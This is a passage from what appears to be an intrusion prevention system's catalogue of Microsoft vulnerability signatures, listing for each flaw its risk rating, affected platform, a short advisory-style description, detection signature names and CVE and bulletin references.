HTTP_CRL-Microsoft-Visual-Studio-Team-Web-Access-Console-Vulnerability

References:

CVE-2012-1892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1892

BID-55409
http://www.securityfocus.com/bid/55409

OSVDB-85315
http://www.osvdb.org/85315

MS12-061
http://technet.microsoft.com/security/bulletin/MS12-061

Microsoft-VM-ActiveX-Component-Vulnerability

About this vulnerability:

There is a code execution vulnerability in Microsoft VM ActiveX control

Risk:

High

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft VM

Type:

Malfunction

Description:

There is a remote code execution vulnerability in Microsoft VM ActiveX control. Microsoft's Java virtual machine allows access to a restricted ActiveX control from scripts. This can lead to code execution in the context of the current user.

Situation:

HTTP_Microsoft-VM-ActiveX-Component-Vulnerability
File-Text_Microsoft-VM-ActiveX-Component-Vulnerability

References:

CVE-2000-1061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1061

BID-1754
http://www.securityfocus.com/bid/1754

MS00-075
http://technet.microsoft.com/security/bulletin/MS00-075

Microsoft-VSCode-Markdown-Preview-Enhanced-Extension-Command-Injection

About this vulnerability:

A vulnerability in Microsoft Visual Studio Code - Markdown Preview Enhanced Extension

Risk:

Moderate

First detected in:

sgpkg-ips-1549-5242

Last changed:

sgpkg-ips-1549-5242

Platform:

Generic

Software:

Microsoft Visual Studio Code

Type:

Input Validation

Description:

Improper input validation in the PDF import functionality in Markdown files causes a command injection vulnerability in Microsoft Visual Studio Code. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

File-Text_Microsoft-Visual-Studio-Code-Markdown-Preview-Enhanced-Extension-Command-Injection

References:

CVE-2022-45025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45025

Microsoft-Windows-2000-Domain-Authentication-Bypass

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Low

First detected in:

sgpkg-ips-604-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Insecure Configuration

Description:

There is a vulnerability within the authentication mechanism within Microsoft Windows 2000 that may allow a user with an expired Windows account to log in to a domain.

Situation:

Generic_UDP-Microsoft-Windows-2000-Domain-Authentication-Bypass

References:

CVE-2004-0540
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0540

Microsoft-Windows-Active-Directory-Browser-Election-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Active Directory

Risk:

High

First detected in:

sgpkg-ips-379-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in Microsoft Windows Server 2003 Active Directory.

Situation:

Generic_UDP-Microsoft-Windows-Active-Directory-Browser-Election-Buffer-Overflow
NetBIOS-UDP_CS-Microsoft-Windows-Active-Directory-Browser-Election-BOF

References:

CVE-2011-0654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0654

BID-46360
http://www.securityfocus.com/bid/46360

OSVDB-70881
http://www.osvdb.org/70881

MS11-019
http://technet.microsoft.com/security/bulletin/MS11-019

Microsoft-Windows-Active-Directory-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Active Directory

Risk:

Moderate

First detected in:

sgpkg-ips-348-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Windows Active Directory buffer overflow.

Situation:

LDAP_CS-Windows-Active-Directory-Buffer-Overflow

References:

CVE-2007-0040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0040

BID-24800
http://www.securityfocus.com/bid/24800

MS07-039
http://technet.microsoft.com/security/bulletin/MS07-039

Microsoft-Windows-Active-Directory-Certificate-Services-CVE-2011-1264

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-397-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2003; Windows 2008; Windows 2008 R2

Software:

<os>

Type:

Cross-site Scripting

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_CRL-Microsoft-Windows-Active-Directory-Certificate-Services-CVE-2011-1264

References:

CVE-2011-1264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1264

MS11-051
http://technet.microsoft.com/security/bulletin/MS11-051

Microsoft-Windows-Active-Directory-Crafted-LDAP-Request-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There is a heap overflow vulnerability in the way Microsoft Windows Active Directory handles LDAP messages. The vulnerability is due to lack of validation for entry length in the LDAP modify message. Remote unauthenticated attackers can exploit this vulnerability to inject and execute arbitrary code on the affected target with System level privileges. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, the System account. In an attack case where code injection is not successful, the Active Directory process, lsass.exe, will terminate abnormally, causing the entire system to shutdown and creating a denial of service condition.

Situation:

LDAP_CS-Microsoft-Windows-Active-Directory-Crafted-LDAP-Request-Buffer-Overflow

References:

CVE-2007-0040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0040

BID-24800
http://www.securityfocus.com/bid/24800

OSVDB-35960
http://www.osvdb.org/35960

MS07-039
http://technet.microsoft.com/security/bulletin/MS07-039

Microsoft-Windows-Active-Directory-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a denial of service vulnerability in Microsoft Windows Active Directory. The vulnerability is due to insufficient check during the processing of LDAP searchRequest. By sending crafted messages to a target server, an unauthenticated attacker may exploit this vulnerability to cause the affected system to stop responding, creating a denial of service condition.

Situation:

LDAP_CS-Microsoft-Windows-Active-Directory-Denial-Of-Service

References:

CVE-2008-1445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1445

BID-29584
http://www.securityfocus.com/bid/29584

MS08-035
http://technet.microsoft.com/security/bulletin/MS08-035

Microsoft-Windows-Active-Directory-Integrated-DNS-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

High

First detected in:

sgpkg-ips-1285-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Server

Type:

Buffer Overflow

Description:

A remote code execution vulnerability has been reported in the Active Directory Integrated DNS (ADIDNS) component of Microsoft Windows. The vulnerability is due to insufficient handling of certain requests handled by ADIDNS. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of arbitrary code as SYSTEM.

Situation:

LDAP_CS-Microsoft-Windows-Active-Directory-Integrated-DNS-Remote-Code-Execution

References:

CVE-2020-0718
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0718

ms20-sep
http://technet.microsoft.com/security/bulletin/ms20-sep

Microsoft-Windows-Active-Directory-LDAP-Parsing-Memory-Corruption

About this vulnerability:

A parsing vulnerability in Microsoft Active Directory LDAP handling

Risk:

Moderate

First detected in:

sgpkg-ips-348-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Microsoft Windows Active Directory LDAP parsing memory corruption vulnerability.

Situation:

LDAP_CS-Windows-Active-Directory-Parsing-Memory-Corruption

References:

CVE-2009-1138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1138

BID-35226
http://www.securityfocus.com/bid/35226

OSVDB-54937
http://www.osvdb.org/54937

MS09-018
http://technet.microsoft.com/security/bulletin/MS09-018

Microsoft-Windows-Active-Directory-Ldaps-Authentication-Bypass

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is an authentication bypass vulnerability in Microsoft Windows Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS). The vulnerability is due to insufficient validation of the revocation status of an SSL certificate against the CRL associated with the domain account when processing LDAPS requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a previously revoked certificate to the LDAP server to authenticate against the Active Directory domain. Successful exploitation will result in authentication against the LDAP server. Please note that the vulnerability exists only when the Active Directory is configured to use LDAP over SSL (LDAPS) which is not the case in the default configuration.

Situation:

LDAP_CS-Microsoft-Windows-Active-Directory-Ldaps-Authentication-Bypass

References:

CVE-2011-2014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2014

MS11-086
http://technet.microsoft.com/security/bulletin/MS11-086

Microsoft-Windows-ActiveX-Data-Objects-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1176-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

ActiveX

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Microsoft Windows ActiveX Data Objects (ADO). The vulnerability is due to improper handling of an object. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted file. Successful exploitation could result in the execution of arbitrary code as the victim user privileges.

Situation:

File-Text_Microsoft-Windows-ActiveX-Data-Objects-Code-Execution

References:

CVE-2019-0888
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0888

Microsoft-Windows-Address-Book-Contact-File-Parsing-CVE-2020-1410

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1264-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A vulnerability in the Address Book component of Microsoft Windows.

Situation:

File-TextId_Microsoft-Windows-Address-Book-Contact-File-Parsing-CVE-2020-1410

References:

CVE-2020-1410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1410

Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-362-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 2008; Windows Vista; Windows 2008

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_CSU-Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147

References:

CVE-2010-3147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3147

MS10-096
http://technet.microsoft.com/security/bulletin/MS10-096

Microsoft-Windows-ADIDNS-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows Server.

Risk:

High

First detected in:

sgpkg-ips-1370-5242

Last changed:

sgpkg-ips-1370-5242

Platform:

Windows

Software:

Windows Server

Type:

Input Validation

Description:

A vulnerability in the Active Directory Integrated DNS component of Windows, versions Server 2008, 2008 R2, 2012, 2012 R2, 2016, 2019, version 1903, 1909, and 2004, which allows remote attacker to disclose information that could facilitate further compromise, due to the insuffucient handling of certain requests by ADIDNS.

Situation:

LDAP_CS-Microsoft-Windows-ADIDNS-Information-Disclosure

References:

CVE-2020-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0856

Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-369-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_SS-Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027
File-Text_Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027

References:

CVE-2011-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0027

BID-45698
http://www.securityfocus.com/bid/45698

OSVDB-70444
http://www.osvdb.org/70444

MS11-002
http://technet.microsoft.com/security/bulletin/MS11-002

Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0091-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-635-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A memory corruption vulnerability exists in Microsoft Windows Adobe Font Driver. The vulnerability is due to improper overwrite of objects in memory when processing crafted fonts. A remote unauthenticated attacker can exploit this vulnerability by enticing a target user to view a maliciously crafted font in an application that utilizes the affected library. Successful exploitation of this vulnerability would result in arbitrary code execution within the Kernel. In case of an unsuccessful code injection attack, the affected system will crash, causing denial of service condition.

Situation:

File-Binary_Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0091-Memory-Corruption

References:

CVE-2015-0091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0091

OSVDB-119362
http://www.osvdb.org/119362

MS15-021
http://technet.microsoft.com/security/bulletin/MS15-021

Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0092-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-635-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A memory corruption vulnerability exists in Microsoft Windows Adobe Font Driver. The vulnerability is due to improper overwrite of objects in memory when processing crafted fonts. A remote unauthenticated attacker can exploit this vulnerability by enticing a target user to view a maliciously crafted font in an application that utilizes the affected library. Successful exploitation of this vulnerability would result in arbitrary code execution within the Kernel. In the case of an unsuccessful code injection attack, the affected system will crash, causing a denial of service condition.

Situation:

File-TextId_Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0092-Memory-Corruption

References:

CVE-2015-0092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0092

OSVDB-119363
http://www.osvdb.org/119363

MS15-021
http://technet.microsoft.com/security/bulletin/MS15-021

Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_SS-Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249
File-Binary_Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249

References:

CVE-2011-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1249

MS11-044
http://technet.microsoft.com/security/bulletin/MS11-044

Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Lync

Risk:

High

First detected in:

sgpkg-ips-552-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Lync; Microsoft Office; Windows Server

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in the way Microsoft Windows, Office and Lync handle certain TIFF image files. When Microsoft's GDI+ library handles a crafted TIFF file it can corrupt memory. A remote attacker could exploit this vulnerability by enticing a user to open a crafted TIFF file, possibly embedded in another file such as Microsoft office document. Successful exploitation could result arbitrary code execution in the context of the currently logged in user.

Situation:

File-OLE_Embedded-TIFF-File
File-Binary_TIFF-File
File-Zip_Microsoft-Office-Open-XML-TIFF-Filename-Detected
File-Zip_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-3
File-Binary_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-2
File-Zip_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-1

References:

CVE-2013-3906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3906

BID-63530
http://www.securityfocus.com/bid/63530

OSVDB-99376
http://www.osvdb.org/99376

MS13-096
http://technet.microsoft.com/security/bulletin/MS13-096

Microsoft-Windows-Animation-Manager-CVE-2016-7205-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-824-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Internet Explorer

Situation:

File-Text_Microsoft-Windows-Animation-Manager-CVE-2016-7205-Memory-Corruption

References:

CVE-2016-7205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7205

MS16-132
http://technet.microsoft.com/security/bulletin/MS16-132

Microsoft-Windows-ASX-File-Parsing-Remote-Buffer-Overflow

About this vulnerability:

A Microsoft Windows ASX File Parsing Remote Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-787-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Player

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Microsoft Windows which allows remote attackers to execute arbitrary code via a crafted media file.

Situation:

SMTP_CS-Microsoft-Windows-ASX-File-Parsing-Remote-Buffer-Overflow

References:

CVE-2012-0150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0150

BID-51913
http://www.securityfocus.com/bid/51913

Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a code execution vulnerability in Microsoft Windows.

Situation:

File-Binary_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability
File-Exe_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability
File-Exe_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability-2

References:

CVE-2015-2387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2387

MS15-077
http://technet.microsoft.com/security/bulletin/MS15-077

Microsoft-Windows-Authentication-Kerberos-NTLM-Fallback-Security-Bypass

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-795-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Windows

Situation:

Generic_CS-Microsoft-Windows-Authentication-Kerberos-NTLM-Fallback-Security-Bypass

References:

CVE-2016-3237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3237

MS16-101
http://technet.microsoft.com/security/bulletin/MS16-101

Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-404-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Microsoft Windows AVI File API. The vulnerability is due to a boundary error when parsing crafted AVI files containing overly large length fields. An attacker could exploit this vulnerability by enticing a target user to open a malicious AVI file.

Situation:

HTTP_SS-Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow
File-RIFF_Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow

References:

CVE-2009-1546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1546

BID-35970
http://www.securityfocus.com/bid/35970

OSVDB-56909
http://www.osvdb.org/56909

MS09-038
http://technet.microsoft.com/security/bulletin/MS09-038

Microsoft-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-369-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_CSU-Microsoft-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145
SMB-TCP_CHS_MS-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145

References:

CVE-2010-3145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3145

BID-42763
http://www.securityfocus.com/bid/42763

MS11-001
http://technet.microsoft.com/security/bulletin/MS11-001

Microsoft-Windows-BranchCache-Insecure-Library-Loading-CVE-2010-3966

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-362-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 2008

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_CSU-Microsoft-Windows-BranchCache-Insecure-Library-Loading-CVE-2010-3966

References:

CVE-2010-3966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3966

BID-45295
http://www.securityfocus.com/bid/45295

OSVDB-69816
http://www.osvdb.org/69816

MS10-095
http://technet.microsoft.com/security/bulletin/MS10-095

Microsoft-Windows-Briefcase-Integer-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Windows

Risk:

Moderate

First detected in:

sgpkg-ips-491-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows.

Situation:

File-Binary_Microsoft-Windows-Briefcase-Integer-Overflow-Vulnerability

References:

CVE-2012-1528
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1528

BID-56442
http://www.securityfocus.com/bid/56442

OSVDB-87259
http://www.osvdb.org/87259

MS12-072
http://technet.microsoft.com/security/bulletin/MS12-072

Microsoft-Windows-Briefcase-Integer-Underflow-Vulnerability

About this vulnerability:

A vulnerability in Windows

Risk:

Moderate

First detected in:

sgpkg-ips-491-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows.

Situation:

File-Binary_Microsoft-Windows-Briefcase-Integer-Underflow-Vulnerability

References:

CVE-2012-1527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1527

BID-56424
http://www.securityfocus.com/bid/56424

OSVDB-87260
http://www.osvdb.org/87260

MS12-072
http://technet.microsoft.com/security/bulletin/MS12-072

Microsoft-Windows-Browser-Election-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-538-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Microsoft Windows Browser Protocol handler. The vulnerability is due to a heap buffer overflow while parsing a Browser Election packet that contains an overly large ServerName. A remote attacker could exploit this vulnerability by sending a specially crafted packet to a vulnerable installation of Windows. Successful exploitation could result in arbitrary code execution with SYSTEM privileges. Unsuccessful code execution attacks may cause a target system to crash (blue screen), leading to a Denial of Service (DoS) condition.

Situation:

NetBIOS-UDP_Microsoft-Windows-Browser-Election-Buffer-Overflow

References:

CVE-2011-0654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0654

BID-46360
http://www.securityfocus.com/bid/46360

MS11-019
http://technet.microsoft.com/security/bulletin/MS11-019

Microsoft-Windows-Cab-File-Parsing-Directory-Traversal

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Directory Traversal

Description:

Improper handling of paths in CAB files causes a directory traversal vulnerability in Windows. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-Binary_Microsoft-Windows-Cab-File-Parsing-Directory-Traversal

References:

CVE-2020-1300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1300

Microsoft-Windows-Cinepak-Codec-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A remote code execution vulnerability exists in the Microsoft Windows Cinepak Codec.

Situation:

HTTP_SS-Microsoft-Windows-Cinepak-Codec-Code-Execution
File-RIFF_Microsoft-Windows-Cinepak-Codec-Code-Execution

References:

CVE-2010-2553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2553

BID-42256
http://www.securityfocus.com/bid/42256

MS10-055
http://technet.microsoft.com/security/bulletin/MS10-055

Microsoft-Windows-CLDAP-Out-Of-Bounds-Read-CVE-2024-49113

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1830-5242

Last changed:

sgpkg-ips-1830-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A denial of service vulnerability exists in Windows Server. This vulnerability is due to an out-of-bounds read that can occur during the handling of Connectionless Lightweight Directory Access Protocol (CLDAP) referral responses. A successful exploit can cause LSASS to crash and reboot.

Situation:

LDAP-UDP_SS-Microsoft-Windows-CLDAP-Out-Of-Bounds-Read-CVE-2024-49113

References:

CVE-2024-49113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49113

ms24-dec
http://technet.microsoft.com/security/bulletin/ms24-dec

Microsoft-Windows-Codecs-Library-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1111-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows detected

Situation:

File-JPEG_Microsoft-Windows-Codecs-Library-Information-Disclosure

References:

CVE-2018-8506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8506

Microsoft-Windows-Color-Control-Panel-Insecure-Library-Loading-CVE-2010-5082

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2008

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_CSU-Microsoft-Windows-Color-Control-Panel-Library-Loading-CVE-2010-5082
SMB-TCP_CHS-Microsoft-Windows-Color-Control-Panel-Library-Loading-CVE-2010-5082

References:

CVE-2010-5082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5082

MS12-012
http://technet.microsoft.com/security/bulletin/MS12-012

Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Microsoft Windows Common Control Library.

Situation:

HTTP_SS-Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow
File-TextId_Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow

References:

CVE-2010-2746
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2746

BID-43717
http://www.securityfocus.com/bid/43717

MS10-081
http://technet.microsoft.com/security/bulletin/MS10-081

Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability

About this vulnerability:

Possibly malicious ActiveX in an OLE file

Risk:

Moderate

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A malicious ActiveX control may allow remote code execution.

Situation:

File-OLE_Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability
File-OLE_Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability
File-RTF_Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability

References:

CVE-2013-1313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1313

OSVDB-90166
http://www.osvdb.org/90166

MS13-020
http://technet.microsoft.com/security/bulletin/MS13-020

Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-713-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

<os>

Type:

Input Validation

Description:

An insecure library loading vulnerability exists in Microsoft Windows COM+ Services component COMSVCS.DLL. The vulnerability is due to the way that the affected component handles the loading of dynamic link library (.DLL) files. A remote attacker could exploit this vulnerability by enticing a target user to open an Office file from an SMB or WebDAV share. Successful exploitation could result in arbitrary code execution in the security context on the target user.

Situation:

File-OLE_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
File-RTF_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
File-TextId_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading

References:

CVE-2015-6132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6132

MS15-132
http://technet.microsoft.com/security/bulletin/MS15-132

Microsoft-Windows-Contacts-Fnsummaryproc-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1568-5242

Last changed:

sgpkg-ips-1568-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Improper handling of VCF and Contact files causes a remote code execution vulnerability in Windows. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Microsoft-Windows-Contacts-Fnsummaryproc-Remote-Code-Execution

References:

CVE-2022-44666
